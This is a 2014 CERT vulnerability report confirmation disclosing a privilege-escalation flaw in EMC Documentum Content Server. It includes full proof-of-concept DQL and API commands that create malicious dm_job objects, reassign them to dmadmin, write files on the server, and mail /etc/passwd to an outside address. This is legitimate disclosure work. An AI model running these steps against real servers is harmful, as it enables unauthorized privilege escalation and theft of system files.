Vulnerability Report Confirmation - [VRF#HUFU6FNP] Your vulnerability report has been successfully received. You may save or print this page for your own records. The Report Tracking ID assigned to this report is VRF#HUFU6FNP. Details of your report are listed below. If you have any questions or require additional information, please call the CERT Hotline at +1 412-268-7090 or send email to cert@cert.org . Please reference this Report Tracking ID: VRF#HUFU6FNP. Do not use the back button to submit another report. Click here instead. ------------------------------------------------------------------------ Vulnerability Report Name Andrey B. Panfilov Organization independent Email Address andrew@panfilov.tel Telephone Number Vulnerability Description EMC Documentum Content Server: any user is able to elevate privileges, hijack Content Server filesystem, execute any commands by creating malicious dm_job objects Documentum Content Server have some docbase methods that are not supposed to be used by regular users (such methods have special permissions, that prevent method invocation by regular user), examples of such methods: 1. mail method - emails text file to user API> retrieve,c,dm_method where object_name='mail' ... 1001d92080000174 API> dump,c,l ... USER ATTRIBUTES object_name : mail owner_permit : 7 group_name : docu group_permit : 5 world_permit : 3 method_verb : ./dm_mailwrapper.sh #!/bin/sh # Mail wrapper: customize if you like # Server will pass in subject, address and content_file # Return of 0 means send succeeded, non-zero status results in the # server generating an error message iff the method was launched # synchronously. delete_contents=0 if [ x"$1" = x"-delete_contents" ] ; then delete_contents=1 shift fi subject=$1 address=$2 content_file=$3 /bin/mail -s "$subject" "$address" < $content_file status=$? if [ $delete_contents = 1 ] ; then # remove the temporary content file once it is sent \rm $content_file fi exit $status Connected to Documentum Server running Release 6.7.1230.0293 Linux.Oracle 1> execute do_method with method='mail', 2> arguments='test andrew@panfilov.tel /etc/passwd' 3> go [DM_METHOD_E_ASSUME_USER_UV]error: "Your method named (mail) failed to execute because the assume user process could not validation your user credentials. Assume User Process returned (245=DM_CHKPASS_BAD_LOGIN)." 2. dm_file_writer - writes data to text files residing on Content Server filesystem API> retrieve,c,dm_method where object_name='dm_file_writer' ... 1001d920800003a1 API> dump,c,l ... USER ATTRIBUTES object_name : dm_file_writer owner_name : dmadmin owner_permit : 7 group_name : docu group_permit : 1 world_permit : 1 method_verb : dmbasic -eEntryPoint -f../install/admin/dm_file_writer.ebs Sub EntryPoint(FilePath As String, DmData As String, WriteMode As String) On Error Goto ErrorCatch Select Case WriteMode Case "DELETE" Call chgEntry(FilePath, DmData, WriteMode) Case "CREATE" Open FilePath For Append As #2 Print #2, DmData Close #2 Case "UPDATE" Call chgEntry(FilePath, DmData, WriteMode) Case "APPEND" Call chgEntry(FilePath, DmData, WriteMode) End Select DmExit 0 ErrorCatch: Print Error$() DmExit 1 End Sub though both methods could not be invoked by non-privileged user, attacker is able to create malicious dm_job object with required parameters, and after that Content Server will execute docbase method: Connected to Documentum Server running Release 6.7.1230.0293 Linux.Oracle 1> create dm_job object 2> set object_name = 'malicious job' 3> set inactivate_after_failure = FALSE 4> set max_iterations = 0 5> set method_name = 'mail' 6> set pass_standard_arguments = FALSE 7> set run_interval = 1 8> set run_mode = 1 9> set run_now = TRUE 10> set start_date = DATE('11/24/2013','mm/dd/yyyy') 11> set expiration_date = DATE('12/11/2016','mm/dd/yyyy') 12> set a_next_invocation = DATE('11/24/2013','mm/dd/yyyy') 13> set is_inactive = FALSE 14> set world_permit=7 15> append method_arguments = 'test' 16> append method_arguments = 'andrew@panfilov.tel' 17> append method_arguments = '/etc/passwd' 18> go object_created ---------------- 0801d920805675b0 (1 row affected) Though Content Server checks dm_job's owner privileges before executing job it's possible to change owner of created dm_job object either through API or Webtop: Connected to Documentum Server running Release 6.7.1230.0293 Linux.Oracle Session id is s0 API> set,c,0801d920805675b0,owner_name SET> dmadmin ... OK API> save,c,0801d920805675b0 ... OK API> ~]$ idql repo -Uuser -Ppassword >/dev/null <<_EOF_ > create dm_job object > set object_name = 'malicious file writer' > set inactivate_after_failure = FALSE > set max_iterations = 0 > set method_name = 'dm_file_writer' > set pass_standard_arguments = FALSE > set run_interval = 1 > set run_mode = 1 > set run_now = TRUE > set start_date = DATE('11/24/2013','mm/dd/yyyy') > set expiration_date = DATE('12/11/2016','mm/dd/yyyy') > set a_next_invocation = DATE('11/24/2013','mm/dd/yyyy') > set is_inactive = FALSE > set world_permit=7 > append method_arguments = '/tmp/test.txt' > append method_arguments = 'agentexec_has_vulnerability' > append method_arguments = 'CREATE' > go > _EOF_ ~]$ iapi repo -Uuser -Ppassword >/dev/null <<_EOF_ > retrieve,c,dm_job where object_name='malicious file writer' > set,c,l,owner_name > dmadmin > save,c,l > _EOF_ ~]$ sleep 60 ~]$ cat /tmp/test.txt agentexec_has_vulnerability ~]$ Can we provide your name to the vendor? Yes Do you want to be publicly acknowledged? Yes Vendor Contact Status will not contact Vendor Name EMC Vendor Contact Name Vendor Contact Email Vendor Contact Telephone Number Vendor Tracking ID Additional Vendor Information Affected System Configurations All versions of EMC Documentum Content Server How was this vulnerability found? Is the vulnerability being exploited? Yes Is there a public exploit? Yes Vulnerability Impact Comments Attached File Date 2014-04-25T14:52:21 Report Tracking ID VRF#HUFU6FNP CERT Tracking IDs VU#315340 ------------------------------------------------------------------------ Carnegie Mellon University ©2014 Carnegie Mellon University